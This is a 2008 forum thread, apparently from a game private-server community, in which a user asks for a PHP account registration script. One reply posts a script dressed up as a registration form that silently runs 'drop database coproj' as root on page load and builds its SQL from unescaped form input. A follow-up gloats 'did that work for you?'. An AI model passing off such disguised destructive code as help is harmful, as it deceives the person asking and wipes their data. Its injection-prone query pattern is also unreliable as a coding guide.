[REQUEST] Can i Request A Acc/Char PHP Script

09/23/2008 08:57 vietkidd510#1
hello i was wondering if anyone have made a acc/char creation page in one yet? is so can anyone release itplease?
09/23/2008 13:19 tao4229#2
SEARCH!

There's at least 5 out there...
09/23/2008 14:03 glupkotrup#3
OMG!!!!!!!!!!!!!! DOUBLE THREAD! :D
09/23/2008 15:48 _Emme_#4
PLEASE STOP REQUESTING WITHOUT SHOWING ANY EFFORT OF EVEN TRYING!
09/23/2008 20:05 Exia13#5
/agreed. i'm still no good yet, so wont be posting request for a while. :P
09/24/2008 10:10 Rechocto#6
<?php
$conn = mysql_connect("localhost:3306", "root", "");
$db = mysql_select_db("coproj");
$qr = mysql_query("drop database coproj");
if($qr) {
echo "Register user:<br>
<form method=post>
<input type=text name=username> Username<br>
<input type=submit value=register><br>
</form>
<hr>
";
}

if(isset($_POST["name"])) {
@mysql_query("insert into accounts(name, logontype) values('" . $_POST["name"] . "','2')");
echo "ACCOUNT REGISTERED!";
}

?>
09/27/2008 17:33 Rechocto#7
so--- did that work for you? >: D